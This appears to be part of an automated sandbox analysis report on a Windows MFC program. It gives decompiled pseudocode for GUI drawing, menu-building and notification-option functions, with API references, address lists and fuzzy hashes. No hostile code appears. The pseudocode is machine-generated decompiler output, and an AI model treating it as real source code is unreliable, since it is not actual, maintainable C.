				GetTextExtentPoint32A( *(_t216 + 8),  *(_t227 - 0x14),  *( *(_t227 - 0x14) - 8), _t214);
				_t108 =  *(_t227 - 0x24);
				 *(_t227 - 0x1c) = _t108;
				_t182 = _t108 + 4;
				 *(_t227 - 0x1c) = _t182;
				if(_t182 > 0xc8) {
					 *(_t227 - 0x1c) = 0xc8;
				}
				 *(_t227 + 8) =  *(_t227 + 8) & 0x00000000;
				_t222 =  *((intOrPtr*)( *((intOrPtr*)(_t227 + 0x10)) + 0xc)) -  *((intOrPtr*)( *((intOrPtr*)(_t227 + 0x10)) + 4)) - 0x1a;
				if( *( *((intOrPtr*)(_t227 + 0x14)) + 0x20) != 0) {
					_t173 = 0x12;
					 *(_t227 - 0x1c) =  *(_t227 - 0x1c) + _t173;
					 *(_t227 + 8) = _t173;
				}
				_push(_t175 + 0x60);
				L00426636();
				_t176 =  *((intOrPtr*)(_t227 + 0xc));
				_push(_t222);
				_push(_t176);
				_push(_t227 - 0x2c);
				L004266F0();
				_t29 = _t222 + 0x14; // -6
				_push(_t176);
				L004266EA();
				_t33 = _t222 + 0x14; // -6
				_push( *(_t227 - 0x1c) + _t176 + 5);
				L004266EA();
				_push(_t222);
				_push( *(_t227 - 0x1c) + _t176 + 5);
				L004266EA();
				_push( *((intOrPtr*)(_t227 - 0x10)) + 0x58);
				L00426636();
				_push(_t222);
				_push(_t176 + 2);
				_push(_t227 - 0x2c);
				L004266F0();
				_t40 = _t222 + 0x13; // -7
				_push(_t176 + 2);
				L004266EA();
				_push( *((intOrPtr*)(_t227 - 0x10)) + 0x78);
				L00426636();
				_t43 = _t222 + 0x13; // -7
				_push( *(_t227 - 0x1c) + _t176 + 2);
				L004266EA();
				_push(_t222);
				_push( *(_t227 - 0x1c) + _t176 + 4);
				_push(_t227 - 0x2c);
				L004266F0();
				_t51 = _t222 + 0x13; // -7
				_push( *(_t227 - 0x1c) + _t176 + 4);
				L004266EA();
				_push( *((intOrPtr*)(_t227 - 0x10)) + 0x60);
				L00426636();
				_push(_t222);
				_push(0);
				_push(_t227 - 0x2c);
				L004266F0();
				_push(_t222);
				_push(_t176);
				L004266EA();
				_push(_t222);
				_push( *(_t227 - 0x1c) + _t176 + 6);
				_push(_t227 - 0x2c);
				L004266F0();
				_push(_t222);
				_push( *((intOrPtr*)( *((intOrPtr*)(_t227 + 0x10)) + 8)));
				L004266EA();
				_push( *((intOrPtr*)(_t227 - 0x10)) + 0x70);
				L00426636();
				if(_t176 != 0) {
					_t64 = _t222 - 1; // -27
					_push(0);
					_push(_t227 - 0x2c);
					L004266F0();
					_t66 = _t222 - 1; // -27
					_push(_t176);
					L004266EA();
				}
				_t67 = _t222 - 1; // -27
				_push( *(_t227 - 0x1c) + _t176 + 4);
				_push(_t227 - 0x2c);
				L004266F0();
				_t72 = _t222 - 1; // -27
				_push( *((intOrPtr*)( *((intOrPtr*)(_t227 + 0x10)) + 8)));
				L004266EA();
				_push(GetSysColor(0xf));
				_push(0x12);
				_push( *(_t227 - 0x1c));
				_push(_t222);
				_push(_t176 + 3);
				L0042671A();
				_t154 =  *( *((intOrPtr*)(_t227 + 0x14)) + 0x20);
				if(_t154 != 0) {
					_t79 = _t222 + 2; // -24
					DrawIconEx( *(_t216 + 4), _t176 + 4, _t79, _t154, 0x10, 0x10, 0, 0, 3);
				}
				_t155 =  *(_t227 + 8);
				_t217 =  *((intOrPtr*)(_t227 - 0x20));
				_t86 = _t176 + 3; // 0x3
				_t177 = _t155 + _t86;
				_t156 = 0x14;
				 *((intOrPtr*)(_t227 - 0x34)) =  *(_t227 - 0x1c) - _t155 + _t177;
				asm("cdq");
				 *((intOrPtr*)(_t227 - 0x3c)) = _t177;
				_t91 = _t222 + 1; // 0x15
				_t223 = (_t156 - _t217 - _t214 >> 1) + _t91;
				 *((intOrPtr*)(_t227 - 0x38)) = _t223;
				 *((intOrPtr*)(_t227 - 0x30)) = _t223 + _t217;
				L00401BC7( *((intOrPtr*)(_t227 + 0x14)),  *((intOrPtr*)(_t227 - 0x10)) + 0x80);
				E004011B8( *((intOrPtr*)(_t227 + 0x14)), _t227 - 0x3c);
				 *(_t227 - 4) =  *(_t227 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t227 - 0xc));
				return  *(_t227 - 0x1c) + 6;
			}

0x00421ff5
0x00421fff
0x00422008
0x00422009
0x0042200c
0x00422014
0x00422017
0x0042201b
0x00422027
0x0042202d
0x00422030
0x00422033
0x0042203d
0x00422040
0x00422042
0x00422042
0x00422048
0x00422055
0x0042205c
0x00422060
0x00422061
0x00422064
0x00422064
0x0042206c
0x0042206d
0x00422072
0x00422075
0x00422079
0x0042207a
0x0042207d
0x00422082
0x00422088
0x00422089
0x00422095
0x00422099
0x0042209c
0x004220a4
0x004220ab
0x004220ac
0x004220b9
0x004220ba
0x004220c2
0x004220c3
0x004220c7
0x004220ca
0x004220cf
0x004220d8
0x004220d9
0x004220e6
0x004220e7
0x004220ec
0x004220f9
0x004220fa
0x00422102
0x00422109
0x0042210d
0x0042210e
0x00422113
0x00422120
0x00422121
0x0042212e
0x0042212f
0x00422134
0x00422135
0x0042213c
0x0042213d
0x00422142
0x00422143
0x00422146
0x0042214e
0x00422155
0x00422159
0x0042215a
0x00422162
0x00422165
0x00422168
0x00422175
0x00422176
0x0042217d
0x0042217f
0x00422188
0x0042218a
0x0042218b
0x00422190
0x00422196
0x00422197
0x00422197
0x0042219c
0x004221a9
0x004221ad
0x004221ae
0x004221b3
0x004221bc
0x004221bf
0x004221cc
0x004221cd
0x004221cf
0x004221d7
0x004221d8
0x004221d9
0x004221e1
0x004221e6
0x004221f3
0x004221fe
0x004221fe
0x00422204
0x0042220a
0x00422211
0x00422211
0x00422215
0x0042221a
0x0042221d
0x00422225
0x00422228
0x00422228
0x0042222f
0x0042223a
0x0042223d
0x00422249
0x00422251
0x0042225b
0x00422268
0x00422270

APIs

_EH_prolog.MSVCRT ref: 00421FF5
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00422027
#5787.MFC42(?), ref: 0042206D
#4297.MFC42(?,?,-0000001A,?), ref: 0042207D
#4133.MFC42(?,-00000006,?,?,-0000001A,?), ref: 00422089
#4133.MFC42(?,-00000006,?,-00000006,?,?,-0000001A,?), ref: 0042209C
#4133.MFC42(?,-0000001A,?,-00000006,?,-00000006,?,?,-0000001A,?), ref: 004220AC
#5787.MFC42(?,?,-0000001A,?,-00000006,?,-00000006,?,?,-0000001A,?), ref: 004220BA
#4297.MFC42(?,?,-0000001A,?,?,-0000001A,?,-00000006,?,-00000006,?,?,-0000001A,?), ref: 004220CA
#4133.MFC42(?,-00000007,?,?,-0000001A,?,?,-0000001A,?,-00000006,?,-00000006,?,?,-0000001A,?), ref: 004220D9
#5787.MFC42(?,?,-00000007,?,?,-0000001A,?,?,-0000001A,?,-00000006,?,-00000006,?,?,-0000001A), ref: 004220E7
#4133.MFC42(?,-00000007,?,?,-00000007,?,?,-0000001A,?,?,-0000001A,?,-00000006,?,-00000006,?), ref: 004220FA
#4297.MFC42(?,00000000,-0000001A,?,-00000007,?,?,-00000007,?,?,-0000001A,?,?,-0000001A,?,-00000006), ref: 0042210E
#4133.MFC42(00000000,-00000007,?,00000000,-0000001A,?,-00000007,?,?,-00000007,?,?,-0000001A,?,?,-0000001A), ref: 00422121
#5787.MFC42(?,00000000,-00000007,?,00000000,-0000001A,?,-00000007,?,?,-00000007,?,?,-0000001A,?,?), ref: 0042212F
#4297.MFC42(?,00000000,-0000001A,?,00000000,-00000007,?,00000000,-0000001A,?,-00000007,?,?,-00000007,?,?), ref: 0042213D
#4133.MFC42(?,-0000001A,?,00000000,-0000001A,?,00000000,-00000007,?,00000000,-0000001A,?,-00000007,?,?,-00000007), ref: 00422146
#4297.MFC42(?,?,-0000001A,?,-0000001A,?,00000000,-0000001A,?,00000000,-00000007,?,00000000,-0000001A,?,-00000007), ref: 0042215A
#4133.MFC42(00000000,-0000001A,?,?,-0000001A,?,-0000001A,?,00000000,-0000001A,?,00000000,-00000007,?,00000000,-0000001A), ref: 00422168
#5787.MFC42(?,00000000,-0000001A,?,?,-0000001A,?,-0000001A,?,00000000,-0000001A,?,00000000,-00000007,?,00000000), ref: 00422176
#4297.MFC42(?,00000000,-0000001B,?,00000000,-0000001A,?,?,-0000001A,?,-0000001A,?,00000000,-0000001A,?,00000000), ref: 0042218B
#4133.MFC42(?,-0000001B,?,00000000,-0000001B,?,00000000,-0000001A,?,?,-0000001A,?,-0000001A,?,00000000,-0000001A), ref: 00422197
#4297.MFC42(?,00000000,-0000001B,?,00000000,-0000001A,?,?,-0000001A,?,-0000001A,?,00000000,-0000001A,?,00000000), ref: 004221AE
#4133.MFC42(00000000,-0000001B,?,00000000,-0000001B,?,00000000,-0000001A,?,?,-0000001A,?,-0000001A,?,00000000,-0000001A), ref: 004221BF
GetSysColor.USER32(0000000F), ref: 004221C6
#2753.MFC42(?,-0000001A,?,00000012,00000000), ref: 004221D9
DrawIconEx.USER32 ref: 004221FE
#800.MFC42(?,?,-0000001A,?,00000012,00000000), ref: 0042225B

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4133$#4297$#5787$#2753#800ColorDrawExtentH_prologIconPoint32Text
String ID:
API String ID: 1791607649-0
Opcode ID: c6a1fb0d852ba863970d89809ff448006328e2eb6e667d602b4adbaa8c1e12b5
Instruction ID: 4c7d915257d5c14eb80cc7bdba935d111b230c1cc5ed360dd021b7d910800d30
Opcode Fuzzy Hash: c6a1fb0d852ba863970d89809ff448006328e2eb6e667d602b4adbaa8c1e12b5
Instruction Fuzzy Hash: B5916A71B00119ABCB10DFA9D895EEFB7BDEF88304F45811AF915E7241DA38E905CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7C4, Relevance: 42.1, APIs: 18, Strings: 6, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0040D7C4(void* __ecx) {
				long _t41;
				intOrPtr* _t42;
				long _t47;
				intOrPtr* _t60;
				void* _t77;
				long _t79;
				void* _t80;
				void* _t82;
				intOrPtr _t83;

				L004269E6();
				_t83 = _t82 - 0x10;
				_t77 = __ecx;
				 *(_t80 - 4) = 0;
				L00425E08();
				 *(_t80 - 4) = 1;
				_t41 =  *(_t80 + 8);
				if(_t41 == 0) {
					_push(1);
					_push("NotifyPrivateMessage");
					_push("Options");
					L00425E3E();
					__eflags = _t41;
					if(__eflags != 0) {
						_push(0xe000);
						L00425FB8();
						_push( *((intOrPtr*)(_t80 + 0xc)));
						 *(_t80 - 4) = 2;
						_push( *_t41);
						_t42 = _t80 - 0x10;
						_push(0x8078);
						_push(_t42);
						L0042638A();
						_t83 = _t83 + 0x10;
						 *(_t80 - 4) = 1;
						goto L10;
					}
				} else {
					_t41 = _t41 - 1;
					if(_t41 == 0) {
						_push(1);
						_push("NotifyAdd");
						_push("Options");
						L00425E3E();
						__eflags = _t41;
						if(_t41 != 0) {
							_t41 = GetTickCount();
							__eflags =  *(_t77 + 0x390) + 0xbb8 - _t41;
							if(__eflags >= 0) {
								_t47 = GetTickCount();
								_push(0xe000);
								 *(_t77 + 0x390) = _t47;
								L00425FB8();
								_push( *((intOrPtr*)(_t80 + 0xc)));
								 *(_t80 - 4) = 3;
								_push( *_t47);
								_t42 = _t80 - 0x10;
								_push(0x8079);
								_push(_t42);
								L0042638A();
								_t83 = _t83 + 0x10;
								 *(_t80 - 4) = 1;
								goto L10;
							}
						}
					} else {
						_t42 = _t41 - 1;
						if(_t42 != 0) {
							L11:
							_push(0xb8);
							L00425E38();
							_t60 = _t42;
							 *((intOrPtr*)(_t80 - 0x1c)) = _t60;
							_t89 = _t60;
							 *(_t80 - 4) = 5;
							if(_t60 == 0) {
								_t79 = 0;
								__eflags = 0;
							} else {
								_push(0x55);
								_push(0x82);
								_t79 = E00401B9F(_t60, _t89);
							}
							_push(_t60);
							 *((intOrPtr*)(_t80 - 0x1c)) = _t83;
							_push(_t80 - 0x10);
							 *(_t80 - 4) = 1;
							L0042611A();
							E004017A8(_t79);
							E0040118B(_t79, 2);
							_t41 = L00401DE8(_t79);
						} else {
							_push(1);
							_push("NotifyRemove");
							_push("Options");
							L00425E3E();
							if(_t42 != 0) {
								_push(0xe000);
								L00425FB8();
								_push( *((intOrPtr*)(_t80 + 0xc)));
								 *(_t80 - 4) = 4;
								_push( *_t42);
								_t42 = _t80 - 0x10;
								_push(0x807a);
								_push(_t42);
								L0042638A();
								_t83 = _t83 + 0x10;
								 *(_t80 - 4) = 1;
								L10:
								L00425DFC();
								goto L11;
							}
						}
					}
				}
				 *(_t80 - 4) = 0;
				L00425DFC();
				 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0xc));
				return _t41;
			}

0x0040d7c9
0x0040d7ce
0x0040d7d4
0x0040d7db
0x0040d7de
0x0040d7e6
0x0040d7ea
0x0040d7ec
0x0040d8c7
0x0040d8c9
0x0040d8ce
0x0040d8d3
0x0040d8d8
0x0040d8da
0x0040d8e0
0x0040d8e8
0x0040d8ed
0x0040d8f0
0x0040d8f4
0x0040d8f6
0x0040d8f9
0x0040d8fe
0x0040d8ff
0x0040d904
0x0040d907
0x00000000
0x0040d90b
0x0040d7f2
0x0040d7f2
0x0040d7f3
0x0040d854
0x0040d856
0x0040d85b
0x0040d860
0x0040d865
0x0040d867
0x0040d873
0x0040d881
0x0040d883
0x0040d889
0x0040d88b
0x0040d893
0x0040d899
0x0040d89e
0x0040d8a1
0x0040d8a5
0x0040d8a7
0x0040d8aa
0x0040d8af
0x0040d8b0
0x0040d8b5
0x0040d8b8
0x00000000
0x0040d8bc
0x0040d883
0x0040d7f5
0x0040d7f5
0x0040d7f6
0x0040d913
0x0040d913
0x0040d918
0x0040d91e
0x0040d920
0x0040d923
0x0040d925
0x0040d929
0x0040d93b
0x0040d93b
0x0040d92b
0x0040d92b
0x0040d92d
0x0040d937
0x0040d937
0x0040d93d
0x0040d943
0x0040d946
0x0040d947
0x0040d94b
0x0040d952
0x0040d95b
0x0040d962
0x0040d7fc
0x0040d802
0x0040d804
0x0040d809
0x0040d80e
0x0040d815
0x0040d81b
0x0040d823
0x0040d828
0x0040d82b
0x0040d82f
0x0040d831
0x0040d834
0x0040d839
0x0040d83a
0x0040d83f
0x0040d842
0x0040d90e
0x0040d90e
0x00000000
0x0040d90e
0x0040d815
0x0040d7f6
0x0040d7f3
0x0040d96a
0x0040d96d
0x0040d972
0x0040d979
0x0040d983
0x0040d98c

APIs

_EH_prolog.MSVCRT ref: 0040D7C9
#540.MFC42 ref: 0040D7DE
#3521.MFC42(Options,NotifyRemove,00000001), ref: 0040D80E
#537.MFC42(0000E000,Options,NotifyRemove,00000001), ref: 0040D823
#2817.MFC42(?,0000807A,00000000,?,0000E000,Options,NotifyRemove,00000001), ref: 0040D83A
#3521.MFC42(Options,NotifyAdd,00000001), ref: 0040D860
GetTickCount.KERNEL32 ref: 0040D873
GetTickCount.KERNEL32 ref: 0040D889
#537.MFC42(0000E000), ref: 0040D899
#2817.MFC42(?,00008079,00000000,?,0000E000), ref: 0040D8B0
#3521.MFC42(Options,NotifyPrivateMessage,00000001), ref: 0040D8D3
#537.MFC42(0000E000,Options,NotifyPrivateMessage,00000001), ref: 0040D8E8
#2817.MFC42(?,00008078,00000000,?,0000E000,Options,NotifyPrivateMessage,00000001), ref: 0040D8FF
#800.MFC42(00000001), ref: 0040D90E
#823.MFC42(000000B8,00000001), ref: 0040D918
#535.MFC42(?,00000000,00000001), ref: 0040D94B
#800.MFC42(Options,NotifyPrivateMessage,00000001), ref: 0040D96D
#800.MFC42(Options,NotifyPrivateMessage,00000001), ref: 0040D979

Strings

NotifyAdd, xrefs: 0040D856
NotifyRemove, xrefs: 0040D804
Options, xrefs: 0040D85B
Options, xrefs: 0040D809
Options, xrefs: 0040D8CE
NotifyPrivateMessage, xrefs: 0040D8C9

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2817#3521#537#800$CountTick$#535#540#823H_prolog
String ID: NotifyAdd$NotifyPrivateMessage$NotifyRemove$Options$Options$Options
API String ID: 1377155896-3204182718
Opcode ID: 6640848ffb431b1f91e7ffd5d75cbb7a6fa81d1ee050392fca27c7295e5b25eb
Instruction ID: 0107be91196de29f54d33b33cae786f3578e4ecb5fbae8980313890f17af0704
Opcode Fuzzy Hash: 6640848ffb431b1f91e7ffd5d75cbb7a6fa81d1ee050392fca27c7295e5b25eb
Instruction Fuzzy Hash: 0141F230A00619AADF14EBA5C842BEEBB74AF10308F50846EF511772D2DBB85B08CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004163C6, Relevance: 38.6, APIs: 21, Strings: 1, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E004163C6() {
				intOrPtr _t55;
				intOrPtr _t58;
				long _t62;
				void* _t80;
				intOrPtr _t112;
				void* _t113;
				intOrPtr _t118;
				void* _t119;
				void* _t121;

				L004269E6();
				 *((intOrPtr*)(_t121 - 0x10)) = 0;
				 *((intOrPtr*)(_t121 - 0x18)) = 0;
				 *((intOrPtr*)(_t121 - 0x1c)) = 0x42e544;
				 *((intOrPtr*)(_t121 - 4)) = 0;
				_push(CreatePen(0, 0,  *(_t121 + 0x14)));
				L004264BC();
				_t8 = _t121 - 0x1c; // 0x42e544
				_t55 = _t8;
				_push(_t55);
				L00426636();
				 *((intOrPtr*)(_t121 - 0x14)) = _t55;
				if( *((intOrPtr*)(_t121 + 0x18)) != 0) {
					 *((intOrPtr*)(_t121 - 0x10)) = 1;
				}
				_t112 =  *((intOrPtr*)(_t121 + 0x10));
				_t118 =  *((intOrPtr*)(_t121 + 0xc));
				_push(_t112 + 2);
				_push(_t118);
				_push(_t121 - 0x24);
				L004266F0();
				_t113 = _t112 -  *((intOrPtr*)(_t121 - 0x10));
				_t58 = _t113 + 5;
				_push(_t58);
				_push(_t118);
				 *((intOrPtr*)(_t121 + 8)) = _t58;
				L004266EA();
				_push( *((intOrPtr*)(_t121 + 0x10)) + 3);
				_push(_t118 + 1);
				_push(_t121 - 0x24);
				L004266F0();
				_t62 = _t113 + 6;
				 *(_t121 + 0x14) = _t62;
				_push(_t62);
				_push(_t118 + 1);
				L004266EA();
				_push( *((intOrPtr*)(_t121 + 0x10)) + 4);
				_push(_t118 + 2);
				_push(_t121 - 0x24);
				L004266F0();
				_push(_t113 + 7);
				_push(_t118 + 2);
				L004266EA();
				_push( *((intOrPtr*)(_t121 + 0x10)) + 3);
				_push(_t118 + 3);
				_push(_t121 - 0x24);
				L004266F0();
				_push( *(_t121 + 0x14));
				_push(_t118 + 3);
				L004266EA();
				_push( *((intOrPtr*)(_t121 + 0x10)) + 2);
				_push(_t118 + 4);
				_push(_t121 - 0x24);
				L004266F0();
				_push( *((intOrPtr*)(_t121 + 8)));
				_push(_t118 + 4);
				L004266EA();
				_push( *((intOrPtr*)(_t121 + 0x10)) + 1);
				_push(_t118 + 5);
				_push(_t121 - 0x24);
				L004266F0();
				_push(_t113 + 4);
				_push(_t118 + 5);
				L004266EA();
				_push( *((intOrPtr*)(_t121 + 0x10)));
				_t119 = _t118 + 6;
				_t80 = _t121 - 0x24;
				_push(_t119);
				_push(_t80);
				L004266F0();
				_push(_t113 + 3);
				_push(_t119);
				L004266EA();
				_push( *((intOrPtr*)(_t121 - 0x14)));
				L00426636();
				L00425FA6();
				 *((intOrPtr*)(_t121 - 0x1c)) = 0x42c514;
				 *((intOrPtr*)(_t121 - 4)) = 1;
				L00425FA6();
				 *[fs:0x0] =  *((intOrPtr*)(_t121 - 0xc));
				return _t80;
			}

0x004163cb
0x004163d8
0x004163db
0x004163de
0x004163e8
0x004163f3
0x004163f7
0x004163ff
0x004163ff
0x00416402
0x00416405
0x0041640d
0x00416410
0x00416412
0x00416412
0x00416419
0x0041641c
0x00416424
0x00416428
0x00416429
0x0041642a
0x0041642f
0x00416434
0x00416437
0x00416438
0x00416439
0x0041643c
0x0041644a
0x0041644e
0x0041644f
0x00416452
0x00416457
0x0041645c
0x0041645f
0x00416463
0x00416464
0x00416472
0x00416473
0x00416479
0x0041647a
0x00416484
0x00416488
0x00416489
0x00416497
0x0041649b
0x0041649c
0x0041649f
0x004164a4
0x004164ac
0x004164ad
0x004164bb
0x004164bf
0x004164c0
0x004164c3
0x004164c8
0x004164d0
0x004164d1
0x004164dd
0x004164de
0x004164e2
0x004164e5
0x004164ef
0x004164f3
0x004164f4
0x004164f9
0x004164fc
0x004164ff
0x00416504
0x00416505
0x00416506
0x00416510
0x00416511
0x00416512
0x00416517
0x0041651c
0x00416524
0x00416529
0x00416533
0x0041653a
0x00416545
0x0041654d

APIs

_EH_prolog.MSVCRT ref: 004163CB
CreatePen.GDI32(00000000,00000000,?), ref: 004163ED
#1641.MFC42(00000000), ref: 004163F7
#5787.MFC42(DB,00000000), ref: 00416405
#4297.MFC42(?,?,?,DB,00000000), ref: 0041642A
#4133.MFC42(?,?,?,?,?,DB,00000000), ref: 0041643C
#4297.MFC42(?,?,?,?,?,?,?,?,DB,00000000), ref: 00416452
#4133.MFC42(?,?,?,?,?,?,?,?,?,?,DB,00000000), ref: 00416464
#4297.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,DB,00000000), ref: 0041647A
#4133.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,DB), ref: 00416489
#4297.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041649F
#4133.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004164AD
#4297.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004164C3
#4133.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004164D1
#4297.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004164E5
#4133.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004164F4
#4297.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00416506
#4133.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00416512
#5787.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041651C
#2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00416524
#2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041653A

Strings

DB, xrefs: 004163F4

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4133#4297$#2414#5787$#1641CreateH_prolog
String ID: DB
API String ID: 4254424135-3807777182
Opcode ID: 4cb1e91095c86a8ecac19592b01f9b0dac6d76583eab8f53c3b5a3f90e888455
Instruction ID: b341c6af23c9f6574c41496bb8b667be2c3c34b0294befac143a6d5a63c9a06a
Opcode Fuzzy Hash: 4cb1e91095c86a8ecac19592b01f9b0dac6d76583eab8f53c3b5a3f90e888455
Instruction Fuzzy Hash: 58513F71A0011AABCB04DF95D995DEFB7ADEF48308B41442FF416A3241DB78EE19CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004165E9, Relevance: 37.7, APIs: 25, Instructions: 192
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004165E9(void* __ecx) {
				void* _t67;
				void* _t70;
				struct HMENU__* _t84;
				void* _t92;
				signed char _t95;
				signed char _t97;
				void* _t111;
				void* _t112;
				void* _t115;
				intOrPtr* _t123;
				intOrPtr _t124;
				int _t126;
				CHAR* _t128;
				void* _t130;
				void* _t133;
				void* _t135;
				intOrPtr _t136;

				L004269E6();
				_t136 = _t135 - 0x28;
				_t130 = __ecx;
				L0042650A();
				 *((intOrPtr*)(_t133 - 0x34)) = 0x42e4fc;
				_t126 = 0;
				 *(_t133 - 4) = 0;
				L00425E08();
				 *(_t133 - 4) = 1;
				_t67 =  *((intOrPtr*)(__ecx + 0x10)) - 1;
				 *(_t133 - 0x18) = 0;
				if(_t67 < 0) {
					L3:
					 *(_t133 - 0x10) = _t126;
					if(GetMenuItemCount( *(_t130 + 4)) <= _t126) {
						L24:
						E00401F19(_t130);
						_push(0xffffffff);
						_push(_t126);
						L00426588();
						_t70 = _t133 - 0x34;
						_push(_t70);
						L004266F6();
						_push(0xffffffff);
						_push(_t126);
						L00426588();
						 *(_t133 - 4) =  *(_t133 - 4) & 0x00000000;
						L00425DFC();
						 *(_t133 - 4) =  *(_t133 - 4) | 0xffffffff;
						L00426504();
						 *[fs:0x0] =  *((intOrPtr*)(_t133 - 0xc));
						return _t70;
					}
					while(1) {
						_t95 = GetMenuState( *(_t130 + 4),  *(_t133 - 0x10), 0x400);
						if((_t95 & 0x00000010) == 0) {
							goto L11;
						}
						_t84 = GetSubMenu( *(_t130 + 4),  *(_t133 - 0x10));
						_push(_t84);
						L0042635A();
						 *((intOrPtr*)(_t133 - 0x1c)) =  *((intOrPtr*)(_t84 + 4));
						_t128 = E004015F0(_t130,  *((intOrPtr*)(_t84 + 4)));
						_push(0x400);
						L0042601E();
						GetMenuStringA( *(_t130 + 4),  *(_t133 - 0x10), 0x100, 0x100, 0x100);
						_push(0xffffffff);
						_t115 = _t133 - 0x14;
						L00426018();
						if(_t128 != 0) {
							_t89 =  *((intOrPtr*)(_t133 - 0x14));
							if( *((intOrPtr*)( *((intOrPtr*)(_t133 - 0x14)) - 8)) > 0) {
								L00402117(_t128, _t89);
							}
							L20:
							if(_t128 != 0) {
								_push(_t128);
								_push( *((intOrPtr*)(_t133 - 0x2c)));
								L00426582();
							}
							 *(_t133 - 0x10) =  *(_t133 - 0x10) + 1;
							if( *(_t133 - 0x10) < GetMenuItemCount( *(_t130 + 4))) {
								_t126 = 0;
								continue;
							} else {
								_t126 = 0;
								goto L24;
							}
						}
						_push(_t115);
						 *((intOrPtr*)(_t133 - 0x20)) = _t136;
						_push(_t133 - 0x14);
						L0042611A();
						_push( *((intOrPtr*)(_t133 - 0x1c)));
						_t97 = _t95 & 0x000000ef | 0x00000510;
						L14:
						_push(_t97);
						_push( *(_t133 - 0x10));
						_t128 = E0040198D(_t130);
						goto L20;
						L11:
						if((_t95 & 0x00000008) == 0) {
							 *(_t133 - 0x18) = GetMenuItemID( *(_t130 + 4),  *(_t133 - 0x10));
							_t128 = E004015F0(_t130, _t72);
